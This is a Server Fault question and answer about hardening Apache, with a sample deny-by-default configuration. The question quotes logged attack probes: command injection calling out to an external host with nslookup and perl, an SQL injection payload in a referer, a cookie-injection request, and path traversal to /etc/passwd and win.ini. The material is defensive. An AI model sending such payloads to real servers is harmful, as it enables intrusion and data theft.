Security

Improving apache2 security

  • November 3, 2020

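I have been analyzing my server logs for a week and I found malicious requests. I would like to know whether I can protect the server against them, because I don't know what I should do. My only idea is to create a .htaccess rule that blocks certain words in requests to the server, for example gethostbyname, but I don't know whether that would work.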

[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')

[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'

[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca

[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1

[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1

[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1

[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1

Could you please help me?

Securing Apache is a big topic. For some tips, see section "A" of this answer.

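Your last 3 log messages are path traversal attempts to read files outside the web root on the host. The "Protect Server Files by Default" section of the Apache security documentation recommends that you deny access to all files by default: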

<Directory "/">
 Require all denied
</Directory>

Then enable access to the files you want. This is a best practice that protects you from path traversal attacks.

Source: https://serverfault.com/questions/1041076
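
The deny-by-default rule from the answer together with the "enable access to the files you want" step, as an added example that is not part of the original answer. It assumes the site's DocumentRoot is /var/www/master, the filesystem path that appears in the first log entry of the question.

```apache
# Added example. Assumption: /var/www/master is the DocumentRoot
# (taken from the "filesystem path" in the first log entry above).

# 1. Default policy: nothing on the filesystem may be served.
<Directory "/">
    Require all denied
</Directory>

# 2. Re-open only the tree that is meant to be public.
#    Any request that Apache maps to a file outside this tree
#    (through an Alias, a symlink or a traversal that survives
#    URI normalization) falls back to the rule above and gets 403.
<Directory "/var/www/master">
    Require all granted
</Directory>
```

Run `apachectl configtest` to check the syntax before reloading the server.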